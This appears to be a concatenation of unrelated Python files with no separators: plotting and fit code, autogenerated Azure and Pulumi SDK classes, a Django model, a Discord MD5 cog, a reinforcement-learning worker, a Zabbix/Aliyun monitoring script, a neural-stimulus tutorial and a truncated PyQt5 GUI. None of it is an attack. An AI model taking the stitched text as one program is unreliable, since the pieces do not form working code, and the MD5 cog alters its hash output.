self.power_plot_arrow.setPos(np.log10(H['power_meter_power'][ii]), np.log10(self.power_plot_y[ii])) def redo_fit(self): lx0, lx1 = self.power_plot_lr.getRegion() x0, x1 = 10**lx0, 10**lx1 X = self.dat['power_meter_power'] n = len(X) ii0 = np.argmin(np.abs(X[:n//2+1]-x0)) ii1 = np.argmin(np.abs(X[:n//2+1]-x1)) print(ii0,ii1) m, b = np.polyfit(np.log10(X[ii0:ii1]), np.log10(self.power_plot_y[ii0:ii1]), deg=1) print("fit", m,b) fit_data = 10**(np.poly1d((m,b))(np.log10(X))) print("fit_data", fit_data) self.power_fit_plotcurve.setData(X, fit_data) self.fit_text.setHtml("

I{:1.2f}

".format(m)) self.fit_text.setPos(0.5*(lx0+lx1), np.log10(fit_data[(ii0+ii1)//2]))#!/usr/bin/env python3 import os import re include_pattern = r'^$' readme_location = os.path.dirname(__file__) + '/../README.md.tpl' readme_replaced = '' with open(readme_location, 'r') as readme: readme_contents = readme.read() readme_replacements = [] for m in re.finditer(include_pattern, readme_contents, flags=re.MULTILINE): (content_start, content_end) = m.span() replacement = { 'start': content_start, 'end': content_end, 'format': m.group('format'), 'file': m.group('include_file') } readme_replacements.append(replacement) last_replacement_index = 0 for replacement in readme_replacements: readme_replaced += readme_contents[last_replacement_index:replacement['start']] readme_replaced += '\n```' + replacement['format'] + '\n' with open(replacement['file']) as f: readme_replaced += f.read() readme_replaced += '```\n' last_replacement_index = replacement['end'] readme_replaced += readme_contents[last_replacement_index:-1] with open('README.md', 'r+') as f: old_readme = f.read() f.seek(0) f.write(readme_replaced) f.truncate() if old_readme != readme_replaced: print('README.md modified') exit(1) else: exit(0) 0 # coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # # Code generated by Microsoft (R) AutoRest Code Generator 2.3.33.0 # Changes may cause incorrect behavior and will be lost if the code is # regenerated. # -------------------------------------------------------------------------- from msrest.serialization import Model class Model(Model): """An Azure Machine Learning Model. :param id: The Model Id. :type id: str :param name: The Model name. :type name: str :param framework: The Model framework. :type framework: str :param framework_version: The Model framework version. :type framework_version: str :param version: The Model version assigned by Model Management Service. :type version: long :param datasets: The list of datasets associated with the model. :type datasets: list[~_restclient.models.DatasetReference] :param url: The URL of the Model. Usually a SAS URL. :type url: str :param mime_type: The MIME type of Model content. For more details about MIME type, please open https://www.iana.org/assignments/media-types/media-types.xhtml :type mime_type: str :param description: The Model description text. :type description: str :param created_time: The Model creation time (UTC). :type created_time: datetime :param modified_time: The Model last modified time (UTC). :type modified_time: datetime :param unpack: Indicates whether we need to unpack the Model during docker Image creation. :type unpack: bool :param parent_model_id: The Parent Model Id. :type parent_model_id: str :param run_id: The RunId that created this model. :type run_id: str :param experiment_name: The name of the experiment where this model was created. :type experiment_name: str :param kv_tags: The Model tag dictionary. Items are mutable. :type kv_tags: dict[str, str] :param properties: The Model property dictionary. Properties are immutable. :type properties: dict[str, str] :param derived_model_ids: Models dervied from this model :type derived_model_ids: list[str] :param sample_input_data: Sample Input Data for the Model. A reference to a dataset in the workspace in the format aml://dataset/{datasetId} :type sample_input_data: str :param sample_output_data: Sample Output Data for the Model. A reference to a dataset in the workspace in the format aml://dataset/{datasetId} :type sample_output_data: str :param resource_requirements: Resource requirements for the model :type resource_requirements: ~_restclient.models.ModelResourceRequirements :param created_by: The User who created this entity. :type created_by: ~_restclient.models.ModelCreatedBy """ _validation = { 'name': {'required': True}, 'url': {'required': True}, 'mime_type': {'required': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'framework': {'key': 'framework', 'type': 'str'}, 'framework_version': {'key': 'frameworkVersion', 'type': 'str'}, 'version': {'key': 'version', 'type': 'long'}, 'datasets': {'key': 'datasets', 'type': '[DatasetReference]'}, 'url': {'key': 'url', 'type': 'str'}, 'mime_type': {'key': 'mimeType', 'type': 'str'}, 'description': {'key': 'description', 'type': 'str'}, 'created_time': {'key': 'createdTime', 'type': 'iso-8601'}, 'modified_time': {'key': 'modifiedTime', 'type': 'iso-8601'}, 'unpack': {'key': 'unpack', 'type': 'bool'}, 'parent_model_id': {'key': 'parentModelId', 'type': 'str'}, 'run_id': {'key': 'runId', 'type': 'str'}, 'experiment_name': {'key': 'experimentName', 'type': 'str'}, 'kv_tags': {'key': 'kvTags', 'type': '{str}'}, 'properties': {'key': 'properties', 'type': '{str}'}, 'derived_model_ids': {'key': 'derivedModelIds', 'type': '[str]'}, 'sample_input_data': {'key': 'sampleInputData', 'type': 'str'}, 'sample_output_data': {'key': 'sampleOutputData', 'type': 'str'}, 'resource_requirements': {'key': 'resourceRequirements', 'type': 'ModelResourceRequirements'}, 'created_by': {'key': 'createdBy', 'type': 'ModelCreatedBy'}, } def __init__(self, name, url, mime_type, id=None, framework=None, framework_version=None, version=None, datasets=None, description=None, created_time=None, modified_time=None, unpack=None, parent_model_id=None, run_id=None, experiment_name=None, kv_tags=None, properties=None, derived_model_ids=None, sample_input_data=None, sample_output_data=None, resource_requirements=None, created_by=None): super(Model, self).__init__() self.id = id self.name = name self.framework = framework self.framework_version = framework_version self.version = version self.datasets = datasets self.url = url self.mime_type = mime_type self.description = description self.created_time = created_time self.modified_time = modified_time self.unpack = unpack self.parent_model_id = parent_model_id self.run_id = run_id self.experiment_name = experiment_name self.kv_tags = kv_tags self.properties = properties self.derived_model_ids = derived_model_ids self.sample_input_data = sample_input_data self.sample_output_data = sample_output_data self.resource_requirements = resource_requirements self.created_by = created_by import uuid from django.conf import settings from django.db import models from django.contrib.contenttypes.fields import GenericRelation from behaviors.behaviors import Timestamped import tldextract from linkanywhere.apps.base.behaviors import Published from linkanywhere.apps.likes.models import Like class Link(Published, Timestamped, models.Model): id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False) owner = models.ForeignKey( settings.AUTH_USER_MODEL, on_delete=models.CASCADE, related_name='links' ) title = models.CharField(max_length=200) url = models.URLField() description = models.TextField() likes = GenericRelation(Like) category = models.ForeignKey( 'categories.Category', on_delete=models.CASCADE, related_name='links' ) tags = models.ManyToManyField( 'tags.Tag', related_name='links' ) class Meta: ordering = ('-publication_date', '-created', 'title') def __str__(self): return '{0}: {1}'.format(self.title, self.url) @property def total_likes(self): return self.likes.count() def get_url_domain(self): """ Extract root domain and top-level domain from URL. """ ext = tldextract.extract(self.url) return '{}.{}'.format(ext.domain, ext.suffix) 0 # coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union from .. import _utilities, _tables __all__ = ['DataExportRule'] class DataExportRule(pulumi.CustomResource): def __init__(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, destination_resource_id: Optional[pulumi.Input[str]] = None, enabled: Optional[pulumi.Input[bool]] = None, name: Optional[pulumi.Input[str]] = None, resource_group_name: Optional[pulumi.Input[str]] = None, table_names: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, workspace_resource_id: Optional[pulumi.Input[str]] = None, __props__=None, __name__=None, __opts__=None): """ Manages a Log Analytics Data Export Rule. ## Example Usage ```python import pulumi import pulumi_azure as azure example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe") example_analytics_workspace = azure.operationalinsights.AnalyticsWorkspace("exampleAnalyticsWorkspace", location=example_resource_group.location, resource_group_name=example_resource_group.name, sku="PerGB2018", retention_in_days=30) example_account = azure.storage.Account("exampleAccount", resource_group_name=example_resource_group.name, location=example_resource_group.location, account_tier="Standard", account_replication_type="LRS") example_data_export_rule = azure.loganalytics.DataExportRule("exampleDataExportRule", resource_group_name=example_resource_group.name, workspace_resource_id=example_analytics_workspace.id, destination_resource_id=example_account.id, table_names=["Heartbeat"]) ``` ## Import Log Analytics Data Export Rule can be imported using the `resource id`, e.g. ```sh $ pulumi import azure:loganalytics/dataExportRule:DataExportRule example /subscriptions/00000000-0000-0000-0000-000000000000/resourcegroups/group1/providers/Microsoft.OperationalInsights/workspaces/workspace1/dataExports/dataExport1 ``` :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] destination_resource_id: The destination resource ID. It should be a storage account, an event hub namespace or an event hub. If the destination is an event hub namespace, an event hub would be created for each table automatically. :param pulumi.Input[bool] enabled: Is this Log Analytics Data Export Rule when enabled? Possible values include `true` or `false`. Defaults to `false`. :param pulumi.Input[str] name: The name of the Log Analytics Data Export Rule. Changing this forces a new Log Analytics Data Export Rule to be created. :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Log Analytics Data Export should exist. Changing this forces a new Log Analytics Data Export Rule to be created. :param pulumi.Input[Sequence[pulumi.Input[str]]] table_names: A list of table names to export to the destination resource, for example: `["Heartbeat", "SecurityEvent"]`. :param pulumi.Input[str] workspace_resource_id: The resource ID of the workspace. Changing this forces a new Log Analytics Data Export Rule to be created. """ if __name__ is not None: warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning) resource_name = __name__ if __opts__ is not None: warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning) opts = __opts__ if opts is None: opts = pulumi.ResourceOptions() if not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') if opts.version is None: opts.version = _utilities.get_version() if opts.id is None: if __props__ is not None: raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource') __props__ = dict() if destination_resource_id is None: raise TypeError("Missing required property 'destination_resource_id'") __props__['destination_resource_id'] = destination_resource_id __props__['enabled'] = enabled __props__['name'] = name if resource_group_name is None: raise TypeError("Missing required property 'resource_group_name'") __props__['resource_group_name'] = resource_group_name if table_names is None: raise TypeError("Missing required property 'table_names'") __props__['table_names'] = table_names if workspace_resource_id is None: raise TypeError("Missing required property 'workspace_resource_id'") __props__['workspace_resource_id'] = workspace_resource_id __props__['export_rule_id'] = None super(DataExportRule, __self__).__init__( 'azure:loganalytics/dataExportRule:DataExportRule', resource_name, __props__, opts) @staticmethod def get(resource_name: str, id: pulumi.Input[str], opts: Optional[pulumi.ResourceOptions] = None, destination_resource_id: Optional[pulumi.Input[str]] = None, enabled: Optional[pulumi.Input[bool]] = None, export_rule_id: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, resource_group_name: Optional[pulumi.Input[str]] = None, table_names: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, workspace_resource_id: Optional[pulumi.Input[str]] = None) -> 'DataExportRule': """ Get an existing DataExportRule resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] destination_resource_id: The destination resource ID. It should be a storage account, an event hub namespace or an event hub. If the destination is an event hub namespace, an event hub would be created for each table automatically. :param pulumi.Input[bool] enabled: Is this Log Analytics Data Export Rule when enabled? Possible values include `true` or `false`. Defaults to `false`. :param pulumi.Input[str] export_rule_id: The ID of the created Data Export Rule. :param pulumi.Input[str] name: The name of the Log Analytics Data Export Rule. Changing this forces a new Log Analytics Data Export Rule to be created. :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Log Analytics Data Export should exist. Changing this forces a new Log Analytics Data Export Rule to be created. :param pulumi.Input[Sequence[pulumi.Input[str]]] table_names: A list of table names to export to the destination resource, for example: `["Heartbeat", "SecurityEvent"]`. :param pulumi.Input[str] workspace_resource_id: The resource ID of the workspace. Changing this forces a new Log Analytics Data Export Rule to be created. """ opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)) __props__ = dict() __props__["destination_resource_id"] = destination_resource_id __props__["enabled"] = enabled __props__["export_rule_id"] = export_rule_id __props__["name"] = name __props__["resource_group_name"] = resource_group_name __props__["table_names"] = table_names __props__["workspace_resource_id"] = workspace_resource_id return DataExportRule(resource_name, opts=opts, __props__=__props__) @property @pulumi.getter(name="destinationResourceId") def destination_resource_id(self) -> pulumi.Output[str]: """ The destination resource ID. It should be a storage account, an event hub namespace or an event hub. If the destination is an event hub namespace, an event hub would be created for each table automatically. """ return pulumi.get(self, "destination_resource_id") @property @pulumi.getter def enabled(self) -> pulumi.Output[Optional[bool]]: """ Is this Log Analytics Data Export Rule when enabled? Possible values include `true` or `false`. Defaults to `false`. """ return pulumi.get(self, "enabled") @property @pulumi.getter(name="exportRuleId") def export_rule_id(self) -> pulumi.Output[str]: """ The ID of the created Data Export Rule. """ return pulumi.get(self, "export_rule_id") @property @pulumi.getter def name(self) -> pulumi.Output[str]: """ The name of the Log Analytics Data Export Rule. Changing this forces a new Log Analytics Data Export Rule to be created. """ return pulumi.get(self, "name") @property @pulumi.getter(name="resourceGroupName") def resource_group_name(self) -> pulumi.Output[str]: """ The name of the Resource Group where the Log Analytics Data Export should exist. Changing this forces a new Log Analytics Data Export Rule to be created. """ return pulumi.get(self, "resource_group_name") @property @pulumi.getter(name="tableNames") def table_names(self) -> pulumi.Output[Sequence[str]]: """ A list of table names to export to the destination resource, for example: `["Heartbeat", "SecurityEvent"]`. """ return pulumi.get(self, "table_names") @property @pulumi.getter(name="workspaceResourceId") def workspace_resource_id(self) -> pulumi.Output[str]: """ The resource ID of the workspace. Changing this forces a new Log Analytics Data Export Rule to be created. """ return pulumi.get(self, "workspace_resource_id") def translate_output_property(self, prop): return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop def translate_input_property(self, prop): return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop from redbot.core import commands from redbot.core.bot import Red import discord import hashlib class MD5(commands.Cog): def __init__(self, bot: Red): self.bot = bot async def red_delete_data_for_user(self, **kwargs): """Nothing to delete""" return @commands.command() async def md5(self, ctx, string): if string: md5Result = hashlib.md5(string.encode("utf-8").lower()).hexdigest().upper() embedMD5 = discord.Embed(title="MD5 Hash", color=0xC60000) embedMD5.add_field( name=string.lower(), value="00" + md5Result[2:16], inline=False ) await ctx.reply(embed=embedMD5) else: embedNoString = discord.Embed(title="MD5 Hash", color=0xC60000) embedNoString.add_field( name="Error", value="Please enter a string", inline=False ) await ctx.reply(embed=embedNoString) projekt/sword.py1-10 from pdb import set_trace as T from collections import defaultdict import numpy as np import ray import projekt from forge import trinity from forge.trinity.timed import runtime from forge.blade.core import realm from forge.ethyr.io import Stimulus, Action from forge.ethyr.experience import RolloutManager from copy import deepcopy @ray.remote class Sword(trinity.Sword): '''Core level Sword API demo This core level rollout worker node runs a copy of the environment and all associated agents. Multiple Swords return observations, actions, and rewards to each server level optimizer node.''' def __init__(self, trin, config, args, idx): '''Initializes a model, env, and relevent utilities''' super().__init__(trin, config, args, idx) config = deepcopy(config) config.DEVICE = 'cpu:0' self.config = config self.args = args self.ent = 0 self.net = projekt.ANN(config) self.obs, _, _, _ = self.env.reset() #For the renderer self.manager = RolloutManager() @runtime def step(self, packet=None): '''Synchronizes weights from upstream and collects a fixed amount of experience.''' self.net.recvUpdate(packet) while self.manager.nUpdates < self.config.SYNCUPDATES: self.tick() return self.manager.send() def tick(self): '''Steps the agent and environment Processes observations, selects actions, and steps the environment to obtain new observations. Serializes (obs, action, reward) triplets for communication to an upstream optimizer node.''' #Batch observations and make decisions stims = Stimulus.process(self.obs) self.manager.collectInputs(self.env, self.obs, stims) actions, outs = [], [] for batch in self.manager.batched( self.config.SYNCBATCH): pop, rollouts, batch = batch keys, obs, stim, _, _, _, _ = batch #Run the policy atns, out, _ = self.net(pop, stim, obs=obs) actions += atns outs += out #Step the environment and all agents at once. #The environment handles action priotization etc. actions = dict(((o[1].entID, a) for o, a in zip(self.obs, actions))) nxtObs, rewards, dones, info = super().step(actions) #Update the experience buffer #The envrionment is used to generate serialization keys self.manager.collectOutputs(self.env, self.obs, outs, rewards, dones) self.obs = nxtObs zabbix/scripts/ali-ecs-monitor/check_ali_ecs.py #!/usr/bin/env python3 #import configparser import hashlib import json import math import os import pymysql import time import sys from aliyunsdkcore.client import AcsClient from aliyunsdkcore.acs_exception.exceptions import ClientException from aliyunsdkcore.acs_exception.exceptions import ServerException from aliyunsdkecs.request.v20140526 import DescribeInstancesRequest from aliyunsdkecs.request.v20140526 import StopInstanceRequest PAGESIZE = 100 def Get_node_ip_name(instances_list): global NODE_INNER_IP_NAMES for instance in instances_list: if instance.get("InnerIpAddress").get("IpAddress"): inner_ip = instance.get("InnerIpAddress").get("IpAddress")[0] instance_name = instance.get("InstanceName") if inner_ip not in NODE_INNER_IP_NAMES: NODE_INNER_IP_NAMES[inner_ip] = instance_name def Get_instances(pagenum): global NODE_COUNT global PAGESIZE request.set_PageSize(PAGESIZE) request.set_PageNumber(pagenum) response = CLIENT.do_action_with_exception(request) json_contents = json.loads(response) if not NODE_COUNT: NODE_COUNT = json_contents.get("TotalCount") instances_list = json_contents.get("Instances").get("Instance") Get_node_ip_name(instances_list) def Get_ip_from_zabbix(): db = pymysql.connect("localhost","root","","zabbix" ) cursor = db.cursor() cursor.execute("select host from hosts") data = cursor.fetchone() db.close() return data def Notification(dict_ip_name): contents = '' if dict_ip_name: for ip,name in dict_ip_name.items(): contents = contents + '实例名: ' + name + ', ip: ' + ip + r'\n' return contents if __name__ == "__main__": #conf = configparser.ConfigParser() #conf.read('ali.ini') #accessKeyId = conf.get('client', 'access-key-id') #accessKeySecret = conf.get('client', 'accesskeysecret') #regionId = conf.get('client', 'regionid') accessKeyId = 'ali-key' accessKeySecret = 'ali-secret' regionId = 'region' CLIENT = AcsClient(accessKeyId, accessKeySecret, regionId) request = DescribeInstancesRequest.DescribeInstancesRequest() # 发起API请求并显示返回值 request.set_PageSize(1) request.set_PageNumber(1) response = CLIENT.do_action_with_exception(request) json_contents = json.loads(response) NODE_COUNT = json_contents.get("TotalCount") NODE_INNER_IP_NAMES = {} last_page = math.ceil(NODE_COUNT / PAGESIZE) + 1 for pagenum in range(1, last_page): Get_instances(pagenum) #print(NODE_INNER_IP_NAMES) db = pymysql.connect(user="zabbix",passwd='',db='zabbix',host='10.10.10.10',charset='utf8') cursor = db.cursor() cursor.execute("select ip,host from interface, hosts where interface.hostid = hosts.hostid") data = cursor.fetchall() db.close() zabbix_ip_names = {} for row in data: zabbix_ip_names[row[0]]=row[1] lost_ip_name = {} for ip,name in NODE_INNER_IP_NAMES.items(): if ip not in zabbix_ip_names.keys(): lost_ip_name[ip] = name print(Notification(lost_ip_name)) #print(jsonData) # -*- coding: utf-8 -*- """ ============================================================================ Generating simple pulses and pulse trains ============================================================================ This example shows how to build and visualize basic types of stimuli such as :py:class:`~pulse2percept.stimuli.MonophasicPulse`, :py:class:`~pulse2percept.stimuli.BiphasicPulse` or a :py:class:`~pulse2percept.stimuli.PulseTrain` for a given implant. A monophasic pulse has a single phase and can be either anodic (by definition: has a positive current amplitude) or cathodic (negative current amplitude). A biphasic pulse is generally charge-balanced for safety reasons (i.e., the net current must sum to zero over time) and defined as either anodic-first or cathodic-first. Multiple pulses can form a pulse train. """ # sphinx_gallery_thumbnail_number = 7 ############################################################################## # Simplest stimulus # --------------------- # :py:class:`~pulse2percept.stimuli.Stimulus` is the base class to generate # different types of stimuli. The simplest way to instantiate a Stimulus is # to pass a scalar value which is interpreted as the current amplitude # for a single electrode. # Let's start by importing necessary modules from pulse2percept.stimuli import (MonophasicPulse, BiphasicPulse, Stimulus, PulseTrain) import numpy as np stim = Stimulus(10) ############################################################################## # Parameters we don't specify will take on default values. We can inspect # all current model parameters as follows: print(stim) ############################################################################## # This command also reveals a number of other parameters to set, such as: # # * ``electrodes``: We can either specify the electrodes in the source # or within the stimulus. If none are specified it looks up the source # electrode. # # * ``metadata``: Optionally we can include metadata to the stimulus we # generate as a dictionary. # # To change parameter values, either pass them directly to the constructor # above or set them by hand, like this: stim.metadata = {'name': 'A simple stimulus', 'date': '2020-01-01'} stim ############################################################################## # A monophasic pulse # -------------------- # We can specify the arguments of the monophasic pulse as follows: pulse_type = 'anodic' # anodic: positive amplitude, cathodic: negative pulse_dur = 4.6 / 1000 # pulse duration in seconds delay_dur = 10.0 / 1000 # pulse delivered after delay in seconds stim_dur = 0.5 # stimulus duration in seconds (pulse padded with zeros) time_step = 0.1 / 1000 # temporal sampling step in seconds ############################################################################## # The sampling step ``time_step`` defines at which temporal resolution the # stimulus is resolved. In the above example, the time step is 0.1 ms. # # By calling Stimulus with a ``MonophasicPulse`` source, we can generate a # single pulse: monophasic_stim = Stimulus(MonophasicPulse(ptype=pulse_type, pdur=pulse_dur, delay_dur=delay_dur, stim_dur=stim_dur, tsample=time_step)) print(monophasic_stim) ############################################################################## # Here, ``data`` is a 2D NumPy array where rows are electrodes and columns are # the points in time. Since we did not specify any electrode names in # ``MonophasicPulse``, the number of electrodes is inferred from the input # source type. There is only one row in the above example, denoting a single # electrode. # # By default, the :py:class:`~pulse2percept.stimuli.MonophasicPulse` object # automatically assumes a current amplitude of 1 uA. ############################################################################## # We can visualize the generated pulse using Matplotlib: import matplotlib.pyplot as plt fig, ax = plt.subplots(figsize=(8, 5)) ax.plot(monophasic_stim.time, monophasic_stim.data[0, :]) ax.set_xlabel('Time (s)') ax.set_ylabel('Amplitude ($\mu$A)') ############################################################################### # A biphasic pulse # ------------------ # Similarly, we can generate a biphasic pulse by changing the source of the # stimulus to :py:class:`~pulse2percept.stimuli.BiphasicPulse`. This time # parameter ``ptype`` can either be 'anodicfirst' or 'cathodicfirst'. # set relevant parameters pulse_type = 'cathodicfirst' biphasic_stim = Stimulus(BiphasicPulse(ptype=pulse_type, pdur=pulse_dur, tsample=time_step)) ############################################################################### # If we visualize this stimulus, we can see the difference between a monophasic # and biphasic pulse: # Create a figure with two subplots fig, axes = plt.subplots(1, 2, figsize=(8, 5)) # First, plot monophasic pulse axes[0].plot(monophasic_stim.time, monophasic_stim.data[0]) ax.set_xlabel('Time (s)') ax.set_ylabel('Amplitude ($\mu$A)') # Second, plot biphasic pulse axes[1].plot(biphasic_stim.time, biphasic_stim.data[0]) ax.set_xlabel('Time (s)') ax.set_ylabel('Amplitude ($\mu$A)') ############################################################################### # Changing pulse amplitude # ---------------------------------- # For any given pulse, we can modify the amplitude by indexing into the ``data`` # row that corresponds to the desired electrode. In the above example, we only # have one electrode (index 0). # Let's say we want the amplitude of the monophasic pulse to be 10 micro amps. # We have two options: either change the values of the ``data`` array directly: # get the data structure by indexing the electrode at 0 monophasic_stim.data[0] = 10 * monophasic_stim.data[0] print(monophasic_stim) ############################################################################### # Or we can create a NumPy array and assign that to the data structure of the # stimulus: # recreate the same stimulus with an amplitude 1 microAmps. monophasic_stim = Stimulus(MonophasicPulse(ptype='anodic', pdur=pulse_dur, delay_dur=delay_dur, stim_dur=stim_dur, tsample=time_step)) monophasic_stim.data[0] = 10 * np.ones_like(monophasic_stim.data[0]) print(monophasic_stim) ############################################################################### # Similarly, let's say we want the cathodic part of the biphasic pulse to be -5 # micro amps, and the anodic part to be +20 micro amps (note that this stimulus # wouldn't be charge-balanced). # # We first need to find the halfway point where the current switches from # cathodic to anodic. To do that we first get the length of the pulse by # indexing the single electrode at 0 length = len(biphasic_stim.data[0]) print(length) # Find the halfway where cathodic turns into anodic pulse half = int(len(biphasic_stim.data[0]) / 2) print("Halfway index is", half) # change the first half of the pulse to be 5 times larger biphasic_stim.data[0][0:half] = 5 * biphasic_stim.data[0][0:half] # change the second half to be 20 times larger biphasic_stim.data[0][half:length] = 20 * biphasic_stim.data[0][half:length] ############################################################################### # Let's plot the monophasic and biphasic pulses again: # Create a figure with two subplots fig, axes = plt.subplots(ncols=2, figsize=(8, 5)) # First, plot monophasic pulse axes[0].plot(monophasic_stim.time, monophasic_stim.data[0]) axes[0].set_xlabel('Time (s)') axes[0].set_ylabel('Amplitude ($\mu$A)') # Second, plot biphasic pulse axes[1].plot(biphasic_stim.time, biphasic_stim.data[0]) axes[1].set_xlabel('Time (s)') axes[1].set_ylabel('Amplitude ($\mu$A)') fig.tight_layout() ############################################################################### # Generating standard pulse trains # ---------------------------------- # The easiest way to generate a pulse train is to use the # :py:class:`~pulse2percept.stimuli.PulseTrain` object, which allows for # various stimulus attributes to be specified: time_step = 0.1 / 1000 # temporal sampling in seconds freq = 20 # frequency in Hz amp = 100 # maximum amplitude of the pulse train in microAmps dur = 0.2 # total duration of the pulse train in seconds pulse_type = 'cathodicfirst' # whether the first phase is positive or negative pulse_order = 'gapfirst' # whether the train starts with gap or a pulse. # Define the pulse train with given parameters ptrain = PulseTrain(tsample=time_step, freq=freq, dur=dur, amp=amp, pulsetype=pulse_type, pulseorder=pulse_order) # Create a new stimulus where the pulse train is the source ptrain_stim = Stimulus(ptrain) # Visualize: fig, ax = plt.subplots(figsize=(8, 5)) ax.plot(ptrain_stim.time, ptrain_stim.data[0, :]) ax.set_xlabel('Time (s)') ax.set_ylabel('Amplitude ($\mu$A)') ############################################################################### # Alternatively, we are free to specify a discrete set of points in time and # the current amplitude we would like to apply at those times. # # It is important to note that the :py:class:`~pulse2percept.stimuli.Stimulus` # object will linearly interpolate between specified time points. # For example, the following generates a simple sawtooth stimulus: stim = Stimulus([[0, -10, 10, -10, 10, -10, 0]], time=[0, 0.1, 0.3, 0.5, 0.7, 0.9, 1.0]) fig, ax = plt.subplots(figsize=(8, 5)) ax.plot(stim.time, stim.data[0, :]) ax.set_xlabel('Time (s)') ax.set_ylabel('Amplitude ($\mu$A)') ############################################################################## # For a biphasic pulse, we need to specify both the rising edge (low-to-high # transition) and falling edge (high-to-low transition) of the signal: stim = Stimulus([[0, 0, 10, 10, 0, 0]], time=[0, 0.1, 0.1, 0.2, 0.2, 1.0]) fig, ax = plt.subplots(figsize=(8, 5)) ax.plot(stim.time, stim.data[0, :]) ax.set_xlabel('Time (s)') ax.set_ylabel('Amplitude ($\mu$A)') ############################################################################## # We can thus generate arbitrarily complex stimuli: stim = Stimulus([[0, 0, 20, 20, -5, -5, 0, 0, 0, 20, 20, -5, -5, 0, 0]], time=[0, 0.1, 0.1, 0.2, 0.2, 0.6, 0.6, 1.0, 1.1, 1.1, 1.2, 1.2, 1.6, 1.6, 2.0]) fig, ax = plt.subplots(figsize=(8, 5)) ax.plot(stim.time, stim.data[0, :]) ax.set_xlabel('Time (s)') ax.set_ylabel('Amplitude ($\mu$A)') 1-10 # -*- coding: utf-8 -*- # Form implementation generated from reading ui file 'gui_csv_to_db.ui' # # Created by: PyQt5 UI code generator 5.15.4 # # WARNING: Any manual changes made to this file will be lost when pyuic5 is # run again. Do not edit this file unless you know what you are doing. from PyQt5 import QtCore, QtGui, QtWidgets from csvtodb.Mysql import Mysql from csvtodb.Laravel import Laravel from csvtodb.Csv import Csv import re class Ui_MainWindow(object): def setupUi(self, MainWindow): # set main window MainWindow.setObjectName("MainWindow") MainWindow.resize(637, 479) font = QtGui.QFont() font.setFamily("MS Shell Dlg 2") font.setBold(False) font.setItalic(False) font.setWeight(50) MainWindow.setFont(font) self.centralwidget = QtWidgets.QWidget(MainWindow) self.centralwidget.setObjectName("centralwidget") # title dbsm self.title_dbsm = QtWidgets.QLabel(self.centralwidget) self.title_dbsm.setGeometry(QtCore.QRect(10, 50, 91, 31)) font = QtGui.QFont() font.setFamily("Amiri") font.setPointSize(20) font.setBold(False) font.setItalic(False) font.setWeight(50) self.title_dbsm.setFont(font) self.title_dbsm.setObjectName("title_dbsm") # title framework self.title_framework = QtWidgets.QLabel(self.centralwidget) self.title_framework.setGeometry(QtCore.QRect(10, 200, 131, 31)) font = QtGui.QFont() font.setFamily("Amiri") font.setPointSize(20) font.setBold(False) font.setItalic(False) font.setWeight(50) self.title_framework.setFont(font) self.title_framework.setObjectName("title_framework") # radio mysql self.btn_mysql = QtWidgets.QRadioButton(self.centralwidget) self.btn_mysql.setGeometry(QtCore.QRect(10, 90, 82, 17)) self.btn_mysql.setObjectName("btn_mysql") self.btn_mysql.toggled.connect(lambda: self.display_opt(dbsm=True)) # radio laravel self.btn_laravel = QtWidgets.QRadioButton(self.centralwidget) self.btn_laravel.setGeometry(QtCore.QRect(10, 250, 82, 17)) self.btn_laravel.setObjectName("btn_laravel") self.btn_laravel.toggled.connect(lambda: self.display_opt(dbsm=False)) # send btn self.send = QtWidgets.QPushButton(self.centralwidget) self.send.setGeometry(QtCore.QRect(0, 400, 631, 71)) self.send.setObjectName("send") self.send.clicked.connect(self.generate) # select csv btn self.btn_select_csv = QtWidgets.QPushButton(self.centralwidget) self.btn_select_csv.setGeometry(QtCore.QRect(290, 60, 75, 23)) self.btn_select_csv.setObjectName("btn_select_csv") self.btn_select_csv.clicked.connect(self.browse_file) # display csv filepath self.csv_filepath_display = QtWidgets.QLineEdit(self.centralwidget) self.csv_filepath_display.setEnabled(True) self.csv_filepath_display.setGeometry(QtCore.QRect(370, 60, 231, 20)) self.csv_filepath_display.setText("") self.csv_filepath_display.setReadOnly(False) self.csv_filepath_display.setObjectName("csv_filepath_display") # btn migration file for framework self.btn_migration_file = QtWidgets.QPushButton(self.centralwidget) self.btn_migration_file.setGeometry(QtCore.QRect(290, 110, 111, 23)) self.btn_migration_file.setObjectName("btn_migration_file") self.btn_migration_file.setVisible(False) self.btn_migration_file.clicked.connect(lambda: self.mig_seed_file(type='migration')) # btn seeder file for framework self.btn_seeder_file = QtWidgets.QPushButton(self.centralwidget) self.btn_seeder_file.setGeometry(QtCore.QRect(290, 150, 111, 23)) self.btn_seeder_file.setObjectName("btn_seeder_file") self.btn_seeder_file.setVisible(False) self.btn_seeder_file.clicked.connect(lambda: self.mig_seed_file(type='seeder')) # select migration seeder for dbsm self.select_migration_seeder = QtWidgets.QComboBox(self.centralwidget) 